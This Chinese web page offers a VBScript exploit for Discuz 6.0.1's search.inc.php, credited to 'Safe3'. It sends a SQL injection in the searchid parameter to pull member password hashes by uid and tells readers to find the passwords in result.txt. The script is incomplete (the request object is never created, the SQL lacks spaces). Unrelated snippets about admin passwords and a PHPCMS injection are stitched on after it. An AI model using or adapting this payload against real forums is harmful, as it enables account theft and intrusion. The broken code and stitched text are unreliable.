时间:2021-05-25
以下是search.inc.php 文件漏洞利用代码VBS版
复制代码代码如下:
Dim strUrl,strSite,strPath,strUid
showB()
Set Args = Wscript.Arguments
If Args.Count <> 3 Then
ShowU()
Else
strSite=Args(0)
strPath=Args(1)
strUid=Args(2)
End If
strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,passwordfromcdb_memberswhereuid=" & strUid &"*"
objXML.SetRequestHeader "Accept-Language", "zh-cn"
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
objXML.SetRequestHeader "User-Agent", "wap"
objXML.send(strUrl)
wscript.echo(objXML.ResponseText)
Sub showB()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("Exploit discuz6.0.1")
.Echo("Code By Safe3")
.Echo("+--------------------------=====================------------------------------+")
End with
End Sub
Sub showU()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("用法:")
.Echo(" cscript "&.ScriptName&" site path uid")
.Echo("例子:")
.Echo(" cscript "&.ScriptName&" http:/// /forum/ 1 >result.txt")
.Echo("+--------------------------=====================------------------------------+")
.Quit
End with
End Sub
获得的密码大家自己在result.txt中查找
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
DISCUZ论坛管理员密码忘记了怎么办?今天,一个朋友在QQ上问我,“如果DISCUZ论坛管理员密码忘记了从MYSQL哪里找啊?”,他用的是HostMonste
00漏洞描述PHPCMS2008由于广告模块取referer不严,导致一处sql注入漏洞.可以得到管理员用户名与密码,攻击者登录后台后可能会获取webshell
“修改wifi密码的管理员密码是什么?想要修改wifi密码,登录路由器时提示输入管理员登录密码,这里的管理员登录密码是什么?”最近看
管理员系列软件最新版本下载214KBWin7右键获取管理员权限工具立即下载4KB系统管理员所有权限获取器立即下载Administrator账户。 以上就是有关
wifi的管理员密码就是就是WiFi网关登录密码,也是无线路由器的管理员密码,即路由器登录密码。不同品牌的路由器,wifi管理员密码各不一样。该密码一般可在路由